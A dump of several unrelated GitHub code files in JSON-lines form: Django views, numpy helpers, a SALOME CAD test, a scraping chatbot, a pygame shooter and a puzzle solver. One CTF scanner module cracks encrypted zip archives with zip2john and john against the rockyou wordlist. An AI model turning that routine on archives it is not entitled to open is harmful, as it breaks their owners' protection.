'POST':\r\n\t\tuser=request.POST[\"user\"]\r\n\t\tfiltered_items=Location.objects.all()\r\n\t\treturn cors_json({'data': map (Location.get_json_object, filtered_items)})\r\n#Adds answers. \r\n@csrf_exempt\r\ndef addanswers(request):\r\n\tif request.method == 'POST':\r\n\t\treceived_json_data=json.loads(request.body)[\"data\"]\r\n\t\tanswers=received_json_data[\"answers\"]\r\n\t\tfor answer in answers:\r\n\t\t\ttime_answered= int(answer[\"time_answered\"])\r\n\t\t\tloc_id=answer[\"loc_id\"]\r\n\t\t\tuser=answer[\"user\"]\r\n\t\t\tanswer_text=answer[\"answer_text\"]\r\n\r\n\t\t\tif \"question_id\" in answer:\r\n\t\t\t\tquestion_id=answer[\"question_id\"]\r\n\t\t\t\tquestion_entry=Question.objects.get(id=question_id)\r\n\t\t\t\tloc_entry=Location.objects.get(id=loc_id)\r\n\t\t\tChoice.objects.create(choice_text=answer_text, person_scanned=user, time_scanned=time_answered, location=loc_entry, question=question_entry )\r\n\t\treturn HttpResponse(\"Sucessful\")\r\n","repo_name":"maroneal1/Barcode-scanner-Front-End","sub_path":"questions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12682363689","text":"import numpy as np\nimport scipy.io as sio\n\ndef reshape_params(nn_params, input_layer_size, hidden_layer_size, num_labels):\n # Reshape weights from flattened param vectors.\n Theta1 = nn_params[:hidden_layer_size * (input_layer_size + 1)].reshape(\n hidden_layer_size, (input_layer_size + 1))\n\n Theta2 = nn_params[hidden_layer_size * (input_layer_size + 1):].reshape(\n num_labels, (hidden_layer_size + 1))\n\n return Theta1, Theta2\n\n\ndef flatten_params(Theta1, Theta2):\n return np.concatenate((Theta1.ravel(), Theta2.ravel()))\n\n\ndef load_data(input, source='numpy'):\n data = sio.loadmat(input);\n X = data['X']\n y = data['y'].flatten()\n # Correction for 1-based Matlab indexing.\n if source == 'matlab':\n y[y == 10] = 0\n return (X, y)\n\n\ndef shuffle_data(X, y):\n if y.ndim == 1:\n y = y.reshape((-1, 1))\n Z = np.c_[X, y]\n np.random.shuffle(Z)\n X, y = Z[:,:-y.shape[1]], Z[:,-y.shape[1]:].astype(np.uint8)\n if y.shape[1] == 1:\n y = y.flatten()\n return X, y\n\n\ndef partition_data(X, y, split):\n m = int(X.shape[0] * split)\n\n # Split into training and validation sets.\n X_1, X_2 = X[:m], X[m:]\n y_1, y_2 = y[:m], y[m:]\n\n return X_1, y_1, X_2, y_2\n","repo_name":"indraastra/nn-ocr","sub_path":"archive/matlab_port/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"40215256066","text":"from SketchAPI import *\n\nfrom salome.shaper import model\n\nmodel.begin()\npartSet = model.moduleDocument()\nPart_1 = model.addPart(partSet)\nPart_1_doc = Part_1.document()\nSketch_1 = model.addSketch(Part_1_doc, model.defaultPlane(\"XOY\"))\nSketchLine_1 = Sketch_1.addLine(0.5, 0, 0, 0)\nSketchProjection_1 = Sketch_1.addProjection(model.selection(\"VERTEX\", \"PartSet/Origin\"), False)\nSketchPoint_1 = SketchProjection_1.createdFeature()\nSketchConstraintCoincidence_1 = Sketch_1.setCoincident(SketchLine_1.endPoint(), SketchPoint_1.result())\nSketchLine_2 = Sketch_1.addLine(0, 37.39521866225591, 0, 40)\nSketchLine_3 = Sketch_1.addLine(0, 40, 0.5, 40)\nSketchLine_4 = Sketch_1.addLine(1, 40, 1, 0.5)\nSketchConstraintCoincidence_2 = Sketch_1.setCoincident(SketchLine_2.endPoint(), SketchLine_3.startPoint())\nSketchConstraintHorizontal_1 = Sketch_1.setHorizontal(SketchLine_1.result())\nSketchConstraintVertical_1 = Sketch_1.setVertical(SketchLine_2.result())\nSketchConstraintHorizontal_2 = Sketch_1.setHorizontal(SketchLine_3.result())\nSketchConstraintVertical_2 = Sketch_1.setVertical(SketchLine_4.result())\nSketchConstraintLength_1 = Sketch_1.setLength(SketchLine_2.result(), 2.604781337744086)\nSketchConstraintLength_2 = Sketch_1.setLength(SketchLine_3.result(), 0.5)\nSketchPoint_2 = Sketch_1.addPoint(0.5, 40)\nSketchConstraintCoincidence_3 = Sketch_1.setCoincident(SketchPoint_2.coordinates(), SketchLine_3.endPoint())\nSketchLine_5 = Sketch_1.addLine(1, 40, 0.5, 40)\nSketchConstraintCoincidence_4 = Sketch_1.setCoincident(SketchLine_4.startPoint(), SketchLine_5.startPoint())\nSketchConstraintCoincidence_5 = Sketch_1.setCoincident(SketchLine_3.endPoint(), SketchLine_5.endPoint())\nSketchConstraintCoincidence_6 = Sketch_1.setCoincident(SketchLine_4.startPoint(), SketchLine_5.result())\nSketchConstraintCoincidence_7 = Sketch_1.setCoincident(SketchLine_3.endPoint(), SketchLine_5.endPoint())\nSketchPoint_3 = Sketch_1.addPoint(0, 36.39521866225591)\nSketchPoint_4 = Sketch_1.addPoint(0, 37.39521866225591)\nSketchConstraintDistanceVertical_1 = Sketch_1.setVerticalDistance(SketchPoint_4.coordinates(), SketchPoint_3.coordinates(), 1)\nSketchConstraintCoincidence_8 = Sketch_1.setCoincident(SketchPoint_4.coordinates(), SketchLine_2.startPoint())\nSketchLine_6 = Sketch_1.addLine(0, 36.39521866225591, 0, 37.39521866225591)\nSketchConstraintCoincidence_9 = Sketch_1.setCoincident(SketchPoint_3.coordinates(), SketchLine_6.startPoint())\nSketchConstraintCoincidence_10 = Sketch_1.setCoincident(SketchLine_2.startPoint(), SketchLine_6.endPoint())\nSketchConstraintCoincidence_11 = Sketch_1.setCoincident(SketchLine_6.endPoint(), SketchLine_2.result())\nSketchLine_7 = Sketch_1.addLine(0, 0, 0, 36.39521866225591)\nSketchConstraintCoincidence_12 = Sketch_1.setCoincident(SketchLine_1.endPoint(), SketchLine_7.startPoint())\nSketchConstraintCoincidence_13 = Sketch_1.setCoincident(SketchPoint_3.coordinates(), SketchLine_7.endPoint())\nSketchConstraintCoincidence_14 = Sketch_1.setCoincident(SketchLine_7.endPoint(), SketchLine_6.result())\nSketchConstraintCoincidence_15 = Sketch_1.setCoincident(SketchLine_7.result(), SketchLine_1.endPoint())\nSketchLine_8 = Sketch_1.addLine(1, 0.5, 0.5, 0)\nSketchConstraintCoincidence_16 = Sketch_1.setCoincident(SketchLine_8.endPoint(), SketchLine_1.startPoint())\nSketchConstraintCoincidence_17 = Sketch_1.setCoincident(SketchLine_8.endPoint(), SketchLine_1.startPoint())\nSketchConstraintCoincidence_18 = Sketch_1.setCoincident(SketchLine_8.startPoint(), SketchLine_4.endPoint())\nSketchConstraintCoincidence_19 = Sketch_1.setCoincident(SketchLine_8.startPoint(), SketchLine_4.endPoint())\nSketchConstraintCoincidence_20 = Sketch_1.setCoincident(SketchLine_8.startPoint(), SketchLine_4.endPoint())\nSketchConstraintParallel_1 = Sketch_1.setParallel(SketchLine_7.result(), SketchLine_4.result())\nSketchConstraintParallel_2 = Sketch_1.setParallel(SketchLine_2.result(), SketchLine_6.result())\nSketchConstraintCoincidence_21 = Sketch_1.setCoincident(SketchLine_2.result(), SketchLine_6.endPoint())\nSketchConstraintCoincidence_22 = Sketch_1.setCoincident(SketchLine_7.endPoint(), SketchLine_6.result())\nSketchConstraintCoincidence_23 = Sketch_1.setCoincident(SketchLine_3.result(), SketchLine_2.endPoint())\nSketchConstraintCoincidence_24 = Sketch_1.setCoincident(SketchLine_5.endPoint(), SketchLine_3.result())\nSketchConstraintLength_3 = Sketch_1.setLength(SketchLine_1.result(), 0.5)\nSketchProjection_2 = Sketch_1.addProjection(model.selection(\"EDGE\", \"PartSet/OX\"), False)\nSketchLine_9 = SketchProjection_2.createdFeature()\nSketchConstraintDistance_1 = Sketch_1.setDistance(SketchLine_8.startPoint(), SketchLine_9.result(), 0.5, True)\nSketchConstraintCoincidence_25 = Sketch_1.setCoincident(SketchLine_4.result(), SketchLine_8.startPoint())\nSketchConstraintCoincidence_26 = Sketch_1.setCoincident(SketchLine_1.startPoint(), SketchLine_8.result())\nSketchConstraintCoincidence_27 = Sketch_1.setCoincident(SketchLine_8.result(), SketchLine_8.startPoint())\nSketchConstraintParallel_3 = Sketch_1.setParallel(SketchLine_3.result(), SketchLine_5.result())\nSketchConstraintLength_4 = Sketch_1.setLength(SketchLine_5.result(), 0.5)\nSketchConstraintCoincidence_28 = Sketch_1.setCoincident(SketchLine_5.result(), SketchLine_4.startPoint())\nSketchConstraintCoincidence_29 = Sketch_1.setCoincident(SketchLine_5.result(), SketchLine_3.endPoint())\nSketchConstraintLength_5 = Sketch_1.setLength(SketchLine_4.result(), 39.5)\nmodel.do()\nRevolution_1 = model.addRevolution(Part_1_doc, [model.selection(\"COMPOUND\", \"all-in-Sketch_1\")], model.selection(\"EDGE\", \"Sketch_1/SketchLine_4\"), 360, 0)\nSketch_2 = model.addSketch(Part_1_doc, model.selection(\"FACE\", \"Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1\"))\nSketchLine_10 = Sketch_2.addLine(1, 1, 1, -1)\nSketchProjection_3 = Sketch_2.addProjection(model.selection(\"EDGE\", \"[Revolution_1_1/Generated_Face&Sketch_1/SketchLine_7][Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1]\"), False)\nSketchCircle_1 = SketchProjection_3.createdFeature()\nSketchConstraintCoincidence_30 = Sketch_2.setCoincident(SketchLine_10.startPoint(), SketchCircle_1.results()[1])\nSketchConstraintCoincidence_31 = Sketch_2.setCoincident(SketchLine_10.endPoint(), SketchCircle_1.results()[1])\nSketchConstraintVertical_3 = Sketch_2.setVertical(SketchLine_10.result())\nSketchConstraintCoincidence_32 = Sketch_2.setCoincident(SketchAPI_Circle(SketchCircle_1).center(), SketchLine_10.result())\nSketchLine_11 = Sketch_2.addLine(0, 0, 2, 0)\nSketchProjection_4 = Sketch_2.addProjection(model.selection(\"VERTEX\", \"[Revolution_1_1/Generated_Face&Sketch_1/SketchLine_7][Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1]\"), False)\nSketchPoint_5 = SketchProjection_4.createdFeature()\nSketchConstraintCoincidence_33 = Sketch_2.setCoincident(SketchLine_11.startPoint(), SketchPoint_5.result())\nSketchProjection_5 = Sketch_2.addProjection(model.selection(\"EDGE\", \"[Revolution_1_1/Generated_Face&Sketch_1/SketchLine_7][Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1]\"), False)\nSketchCircle_2 = SketchProjection_5.createdFeature()\nSketchConstraintCoincidence_34 = Sketch_2.setCoincident(SketchLine_11.endPoint(), SketchCircle_2.results()[1])\nSketchConstraintCoincidence_35 = Sketch_2.setCoincident(SketchAPI_Circle(SketchCircle_1).center(), SketchLine_11.result())\nSketchLine_12 = Sketch_2.addLine(1.25, 0, 1.176776695296637, 0.1767766952966369)\nSketchConstraintCoincidence_36 = Sketch_2.setCoincident(SketchLine_12.startPoint(), SketchLine_11.result())\nSketchLine_13 = Sketch_2.addLine(1.176776695296637, 0.1767766952966369, 1, 0.25)\nSketchConstraintCoincidence_37 = Sketch_2.setCoincident(SketchLine_12.endPoint(), SketchLine_13.startPoint())\nSketchConstraintCoincidence_38 = Sketch_2.setCoincident(SketchLine_13.endPoint(), SketchLine_10.result())\nSketchProjection_6 = Sketch_2.addProjection(model.selection(\"EDGE\", \"[Revolution_1_1/Generated_Face&Sketch_1/SketchLine_8][Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1]\"), True)\nSketchCircle_3 = SketchProjection_6.createdFeature()\nSketchLine_14 = Sketch_2.addLine(1.176776695296637, 0.1767766952966369, 1.738436468990353, 0.6743230541046004)\nSketchConstraintCoincidence_39 = Sketch_2.setCoincident(SketchLine_12.endPoint(), SketchLine_14.startPoint())\nSketchProjection_7 = Sketch_2.addProjection(model.selection(\"EDGE\", \"[Revolution_1_1/Generated_Face&Sketch_1/SketchLine_7][Revolution_1_1/Generated_Face&Sketch_1/SketchLine_1]\"), False)\nSketchCircle_4 = SketchProjection_7.createdFeature()\nSketchConstraintCoincidence_40 = Sketch_2.setCoincident(SketchLine_14.endPoint(), SketchCircle_4.results()[1])\nSketchCircle_5 = Sketch_2.addCircle(1, 0, 0.25)\nSketchCircle_5.setAuxiliary(True)\nSketchConstraintCoincidence_41 = Sketch_2.setCoincident(SketchAPI_Circle(SketchCircle_1).center(), SketchCircle_5.center())\nSketchConstraintCoincidence_42 = Sketch_2.setCoincident(SketchLine_12.startPoint(), SketchCircle_5.results()[1])\nSketchConstraintCoincidence_43 = Sketch_2.setCoincident(SketchLine_12.endPoint(), SketchCircle_5.results()[1])\nSketchConstraintRadius_1 = Sketch_2.setRadius(SketchCircle_5.results()[1], 0.25)\nSketchConstraintEqual_1 = Sketch_2.setEqual(SketchLine_13.result(), SketchLine_12.result())\nSketchConstraintCoincidence_44 = Sketch_2.setCoincident(SketchLine_13.endPoint(), SketchCircle_5.results()[1])\nSketchConstraintMirror_1_objects = [SketchLine_13.result(), SketchLine_12.result(), SketchLine_14.result()]\nSketchConstraintMirror_1 = Sketch_2.addMirror(SketchLine_10.result(), SketchConstraintMirror_1_objects)\n[SketchLine_15, SketchLine_16, SketchLine_17] = SketchConstraintMirror_1.mirrored()\nSketchConstraintMirror_2_objects = [SketchLine_14.result(), SketchLine_12.result(), SketchLine_13.result(), SketchLine_15.result(), SketchLine_16.result(), SketchLine_17.result()]\nSketchConstraintMirror_2 = Sketch_2.addMirror(SketchLine_11.result(), SketchConstraintMirror_2_objects)\n[SketchLine_18, SketchLine_19, SketchLine_20, SketchLine_21, SketchLine_22, SketchLine_23] = SketchConstraintMirror_2.mirrored()\nmodel.do()\nEdge_1_objects = [model.selection(\"EDGE\", \"Sketch_2/SketchLine_23\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_21\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_22\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_10\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_15\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_16\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_17\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_11\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_12\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_20\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_19\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_18\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_13\"), model.selection(\"EDGE\", \"Sketch_2/SketchLine_14\"), model.selection(\"EDGE\", \"Sketch_2/SketchProjection_6\")]\nEdge_1 = model.addEdge(Part_1_doc, Edge_1_objects)\nExtrusion_1 = model.addExtrusion(Part_1_doc, [model.selection(\"COMPOUND\", \"all-in-Edge_1\")], model.selection(\"EDGE\", \"PartSet/OY\"), model.selection(\"FACE\", \"Revolution_1_1/Generated_Face&Sketch_1/SketchLine_3\"), 0, model.selection(), 0)\nmodel.end()\n\nfrom GeomAPI import *\n\nmodel.testNbResults(Extrusion_1, 1)\nmodel.testNbSubResults(Extrusion_1, [15])\nmodel.testNbSubShapes(Extrusion_1, GeomAPI_Shape.SOLID, [0])\nmodel.testNbSubShapes(Extrusion_1, GeomAPI_Shape.FACE, [15])\nmodel.testNbSubShapes(Extrusion_1, GeomAPI_Shape.EDGE, [102])\nmodel.testNbSubShapes(Extrusion_1, GeomAPI_Shape.VERTEX, [204])\nmodel.testResultsAreas(Extrusion_1, [466.947878])\n\nassert(model.checkPythonDump())\n","repo_name":"x3-apptech/salome-modules-shaper","sub_path":"src/FeaturesPlugin/Test/Test17261.py","file_name":"Test17261.py","file_ext":"py","file_size_in_byte":11518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14756687184","text":"import random\nimport requests\nfrom googlesearch import search\nfrom bs4 import BeautifulSoup\n\nclass ChatBot:\n\n def reply(self, text):\n simple_answers = [\"Who created the Armenian alphabet?\", \"where Mesrop Mashtots was born?\"]\n if \"?\" in text:\n return random.choice(simple_answers)\n else:\n return random.choice(simple_answers)\n\n#\n# bob = ChatBot()\n#\n# jek = ChatBot()\n# answer = \"\"\n#\n# while True:\n# if \"by\" in answer:\n# break\n# else:\n# answer = bob.reply(answer)\n# print(\"Bob typing ...\\n\", \" \", answer)\n# if \"by\" in answer:\n# break\n# else:\n# answer = jek.reply(answer)\n# print(\"Jek tayping ...\\n\", \" \", answer)\n\n\n\nclass ChatBotMl:\n def reply(self, text):\n search_result_list = list(search(text, tld=\"com\", num=10, stop=3, pause=1))\n page = requests.get(search_result_list[0])\n html_content = page.text\n soup = BeautifulSoup(html_content, 'html.parser')\n # soup.title\n # soup.title.string\n # soup.p # first paragraph\n #\n # soup.find('p').text # first paragraph text\n # parent child\n # soup.p.parent.name\n\n ps = list(soup.find_all(\"p\", limit=5))\n print(ps[2].text)\n\n # dir(soup)\n # help(soup.a)\n # print(html_content)\n\n\nbob = ChatBotMl()\njek = ChatBotMl()\n\nanswer = \"hello\"\nwhile True:\n answer = jek.reply(answer)\n # print(answer)\n answer = bob.reply(answer)\n # print(answer)","repo_name":"Arina-prog/Python_homeworks","sub_path":"machin learning/homework2/chat_bot2.py","file_name":"chat_bot2.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4015675967","text":"from utils.misc import execmd\r\nfrom os import path\r\n\r\ndef help():\r\n\tconfig = {\r\n\t\t'type':{'other':['.zip']},\r\n\t\t'linux':True,\r\n\t\t'windows':False,\r\n\t\t'name':'ZipCracker'\r\n\t}\r\n\treturn config\r\n\r\n\r\ndef scan(config):\r\n\tconfig_current = help()\r\n\r\n\tpath1 = '%s/zipinfo.txt'%config['env_dir']\r\n\tpath2 = '%s/hash_zip.txt'%config['env_dir']\r\n\tpath3 = '%s/zip_cracked.txt'%config['env_dir']\r\n\r\n\tcmd1 = 'zipinfo %s > %s'%(config['path'],path1)\r\n\tcmd2 = 'zipdetails %s >> %s'%(config['path'],path1)\r\n\r\n\trockyou = \"/usr/share/wordlists/rockyou.txt\"\r\n\tmore = 'timeout 30 john %s --wordlist=%s --show;john %s --show > %s'%(path2,rockyou,path2,path3) if(path.exists(rockyou)) else ''\r\n\r\n\tcmd3 =\"\"\"\r\nif zipdetails %s | grep -q Encryption; then\r\n zip2john %s > %s;\r\n %s\r\nfi\r\n\"\"\"[1:-1]%(config['path'],config['path'],path2,more)\r\n\r\n\t[execmd(c) for c in (cmd1,cmd2,cmd3)]\r\n\t\r\n\tresult_path = [p for p in (path1,path2,path3) if path.exists(p)]\r\n\t\r\n\treturn {\"type\":\"file\",\"path\":result_path,\"content\":\"\"}\r\n\r\n#####################\r\n# \"config\": \r\n#####################\r\n# env_dir : Directory Created for the scanned filed\r\n# system_tp : linux/windows\r\n# path : File path\r\n# json : Json response required (optional)\r\n# quiet : Use quiet mode ? (optional)\r\n# password : Password provided (optional)\r\n# iv : Iv provided (hex) (optional)\r\n# formatflag : Format flag (optional)\r\n# module : Module selected (optional)","repo_name":"Vozec/CTFilesScan","sub_path":"modules/other_zip.py","file_name":"other_zip.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2875320341","text":"# Pygame Boilerplate\n# Author: Tyler\n\n\nimport random\nimport time\nimport pygame\nimport pygame.sprite\n\npygame.init()\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nBGCOLOUR = (100, 100, 255)\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSCREEN_SIZE = (SCREEN_WIDTH, SCREEN_HEIGHT)\nWINDOW_TITLE = \"<<Collecting Blocks>>\"\n\n\nclass Player(pygame.sprite.Sprite):\n \"\"\"Describes a player object\n A subclass of pygame.sprite.Sprite\n\n Attributes:\n image: Surface that is the visual\n representation of or Block\n rect: numerical representation of\n our Block [x, y, width, height]\n hp: describe how much health our\n player has\n \"\"\"\n\n def __init__(self) -> None:\n # Call the superclass constructor\n super().__init__()\n\n # Create the image of the block\n self.image = pygame.image.load(\"./images/charizard.png\")\n\n # Resize the image (scale)\n self.image = pygame.transform.scale(self.image, (42, 42))\n\n self.rect = self.image.get_rect()\n\n # Initial health points\n self.hp = 100\n\n def hp_remaining(self) -> int:\n \"\"\"Return the percent of health remaining\"\"\"\n return self.hp / 100\n\n\nclass Enemy(pygame.sprite.Sprite):\n \"\"\"The enemy sprites\n\n Attributes:\n image: Surface that is the visual representation\n rect: Rect (x, y, width, height)\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.image = pygame.image.load(\"./images/spaceinvaders.png\")\n # Resize the image (scale)\n self.image = pygame.transform.scale(self.image, (56, 40))\n\n self.rect = self.image.get_rect()\n # Define the initial location\n self.rect.x, self.rect.y = (\n random.randrange(SCREEN_WIDTH),\n random.randrange(SCREEN_HEIGHT)\n )\n\n # Define the initial velocity\n self.x_vel = random.choice([-4, -3, 3, -4])\n self.y_vel = random.choice([-4, -3, 3, -4])\n\n def update(self) -> None:\n \"\"\"Calculate movement\"\"\"\n self.rect.x += self.x_vel\n self.rect.y += self.y_vel\n\n # Constrain movement\n # X -\n if self.rect.left < 0:\n self.rect.x = 0\n self.x_vel = -self.x_vel # bounce\n\n if self.rect.right > SCREEN_WIDTH:\n self.rect.right > SCREEN_WIDTH\n self.x_vel = -self.x_vel # bounce\n # y -\n if self.rect.y < 0:\n self.rect.y = 0\n self.y_vel = -self.y_vel # bounce\n if self.rect.bottom > SCREEN_HEIGHT:\n self.rect.bottom > SCREEN_HEIGHT\n self.y_vel = -self.y_vel # bounce\n\n\nclass Bullet(pygame.sprite.Sprite):\n \"\"\"Bullet\n\n Attributes:\n image: visual representation\n rect: mathematical representation\n vel_y: y velocity in px/sec\n \"\"\"\n\n def __init__(self, coords: tuple):\n \"\"\"\n\n Arguments:\n coords: tuple of (x, y) to represent initial location\n \"\"\"\n super().__init__()\n\n self.image = pygame.Surface((5, 10))\n self.image.fill(BLACK)\n self.rect = self.image.get_rect()\n\n # Set the middle of the bullet to be at coords\n self.rect.center = coords\n\n self.vel_y = 5\n\n def update(self):\n self.rect.y -= self.vel_y\n\nclass Superbullet(pygame.sprite.Sprite):\n \"\"\"Superbullet\n\n Attributes:\n image: visual representation\n rect: mathematical representation\n vel_y: y velocity in px/sec\n \"\"\"\n\n def __init__(self, coords: tuple):\n \"\"\"\n\n Arguments:\n coords: tuple of (x, y) to represent initial location\n \"\"\"\n super().__init__()\n\n self.image = pygame.Surface((8, 20))\n self.image.fill(RED)\n self.rect = self.image.get_rect()\n\n # Set the middle of the bullet to be at coords\n self.rect.center = coords\n\n self.vel_y = 4\n\n def update(self):\n self.rect.y -= self.vel_y\n\n\ndef main() -> None:\n \"\"\"Driver of the Python script\"\"\"\n # Create the screen\n screen = pygame.display.set_mode(SCREEN_SIZE)\n pygame.display.set_caption(WINDOW_TITLE)\n\n # Create some local variables that describe the environment\n done = False\n clock = pygame.time.Clock()\n score = 0\n num_enemies = 15\n time_start = time.time()\n time_invincible = 3\n game_state = \"running\"\n time_ended = time.time()\n time_cooldown = 4\n super_bulletnumber = 1\n\n # Check for high score\n with open(\"./data/shootemup_highscore.txt\") as f:\n high_score = int(f.readline().strip())\n\n endgame_messages = {\n \"win\": \"Congratulations, you won!\",\n \"lose\": \"Sorry, they got you. Play again!\"\n }\n\n font = pygame.font.SysFont(\"Georgia\", 25)\n\n pygame.mouse.set_visible(False)\n\n # Create groups to hold sprites\n all_sprites = pygame.sprite.Group()\n enemy_sprites = pygame.sprite.Group()\n bullet_sprites = pygame.sprite.Group()\n\n # Create the Player block\n player = Player()\n # Add the player to all sprites group\n all_sprites.add(player)\n\n # ----------- MAIN LOOP\n while not done:\n # ----------- EVENT LISTENER\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if event.type == pygame.MOUSEBUTTONUP:\n if len(bullet_sprites) < 3 and time.time() - time_start > time_invincible:\n bullet = Bullet(player.rect.midtop)\n # Add it to the allsprites group\n all_sprites.add(bullet)\n bullet_sprites.add(bullet)\n\n if pygame.key.get_pressed([pygame.K_SPACE]):\n # Do something for the keyboard\n if len(super_bullet) < 1 and time.time() - time.start > time_invincible:\n super_bullet = Superbullet(player.rect.midtop)\n all_sprites.add(bullet)\n super_bullet.add(bullet)\n pass\n\n # LOSE CONDITION - Player hp goes below 0\n if player.hp_remaining() <= 0:\n done = True\n # ----------- CHANGE ENVIRONMENT\n # Process player movement based on mouse pos\n mouse_pos = pygame.mouse.get_pos()\n player.rect.x, player.rect.y = mouse_pos\n\n # Check nu,ber of enemies currently on the screen\n if len(enemy_sprites) < 1:\n # Create enemy sprites\n for i in range(num_enemies):\n enemy = Enemy()\n\n # Set a random location for the enemy inside the screen\n enemy.rect.x = random.randrange(SCREEN_WIDTH - enemy.rect.width)\n enemy.rect.y = random.randrange(SCREEN_HEIGHT - enemy.rect.height)\n\n # Add the enemy to the enemy_sprites Group\n # Add the enemy to the all_sprites Group\n enemy_sprites.add(enemy)\n all_sprites.add(enemy)\n\n num_enemies += 5\n if player.hp <= 80:\n player.hp += 20\n super_bulletnumber += 1\n\n # Update the location of all the sprites (blocks, player)\n if game_state == 'running':\n enemy_sprites.update()\n bullet_sprites.update()\n player.update()\n\n # Check all collisions between player and enemies\n enemy_collided = pygame.sprite.spritecollide(player, enemy_sprites, False)\n\n # Set a time for invincibility at start of game\n if time.time() - time_start > time_invincible:\n if game_state == \"running\":\n for enemy in enemy_collided:\n player.hp -= 1\n print(player.hp) # debugging\n\n elif game_state == \"won\":\n for enemy in enemy_collided:\n player.hp - 0\n\n # Check bullet collisions with enemies\n # Kill the bullets when they've left the screen\n for bullet in bullet_sprites:\n enemies_bullet_collided = pygame.sprite.spritecollide(\n bullet,\n enemy_sprites,\n True\n )\n\n # If the bullet has struck some enemy\n if len(enemies_bullet_collided) > 0:\n bullet.kill()\n score += 1\n\n if bullet.rect.y < 0:\n bullet.kill()\n\n for super_bullet in bullet_sprites:\n enemies_bullet_collided = pygame.sprite.spritecollide(\n super_bullet,\n enemy_sprites,\n True\n )\n\n # If the bullet has struck some enemy\n if enemies_bullet_collided:\n score += 1\n\n if bullet.rect.y < 0:\n bullet.kill()\n\n # ----------- DRAW THE ENVIRONMENT\n screen.fill(BGCOLOUR) # fill with bgcolor\n\n # Draw all sprites\n all_sprites.draw(screen)\n\n # Draw the score on the screen\n screen.blit(\n font.render(f\"Score: {score}\", True, BLACK),\n (5, 5)\n )\n # Draw the high score on the screen\n screen.blit(\n font.render(f\"High Score: {high_score}\", True, BLACK),\n (5, 30)\n )\n\n # Draw a health bar\n # Draw the background rectangle\n pygame.draw.rect(screen, GREEN, [580, 5, 215, 20])\n # Draw the foreground rectangle which represents the remaining health\n life_remaining = 215 - int(215 * player.hp_remaining())\n pygame.draw.rect(screen, BLACK, [580, 5, life_remaining, 20])\n\n # If we've won, draw the text on the screen\n if game_state == \"won\":\n screen.blit(\n font.render(endgame_messages[\"win\"], True, BLACK),\n (SCREEN_WIDTH / 3, SCREEN_HEIGHT / 2)\n )\n if game_state == \"lose\":\n screen.blit(\n font.render(endgame_messages[\"lose\"], True, BLACK),\n (SCREEN_WIDTH / 3, SCREEN_HEIGHT / 2)\n )\n\n # Update the screen\n pygame.display.flip()\n\n # ----------- CLOCK TICK\n clock.tick(75)\n\n # Clean-up\n\n # Update the high score if the current score is the highest\n with open(\"./data/shootemup_highscore.txt\", \"w\") as f:\n if score > high_score:\n f.write(str(score))\n else:\n f.write(str(high_score))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DrKelp0/problem-set-1","sub_path":"shootemup.py","file_name":"shootemup.py","file_ext":"py","file_size_in_byte":10380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30236991654","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 30 18:14:15 2022\n\n@author: shavak\n\"\"\"\n\ninput_file = \"input.txt\"\nN = 50\nA = \"\"\nD = {}\nx_min = 0\nx_max = 0\ny_min = 0\ny_max = 0\ninfinite_light = False\n\ndef is_exterior(x, y):\n return x <= x_min or x >= x_max or y <= y_min or y >= y_max\n\ndef is_lit(x, y):\n if (x, y) in D:\n return True\n if infinite_light and is_exterior(x, y):\n return True\n return False\n\ndef algorithm_index(x, y):\n ans = 0\n for v in range(y + 1, y - 2, -1):\n for u in range(x - 1, x + 2):\n ans = 2 * ans + is_lit(u, v)\n return ans\n\ndef enhance_image():\n global D\n global x_min\n global x_max\n global y_min\n global y_max\n global infinite_light\n E = {}\n for x in range(x_min, x_max + 1):\n for y in range(y_min, y_max + 1):\n i = algorithm_index(x, y)\n if A[i] == \"#\":\n E[(x, y)] = 1\n D = E\n x_min -= 1\n x_max += 1\n y_min -= 1\n y_max += 1\n if infinite_light:\n infinite_light = A[-1] == \"#\"\n else:\n infinite_light = A[0] == \"#\"\n \ndef num_lit_pixels():\n if infinite_light:\n return float(\"inf\")\n return len(D)\n \nwith open(input_file, \"r\") as f:\n A = f.readline().strip()\n line = f.readline()\n line = f.readline()\n x = 0\n y = 0\n while line:\n l = len(line) - 1\n x = 0\n while x < l:\n if line[x] == '#':\n D[(x, y)] = 1\n x += 1\n y -= 1\n line = f.readline()\nx_min = -1\nx_max = x\ny_min = y\ny_max = 1\nfor i in range(N):\n enhance_image()\nprint(\"\\nNumber 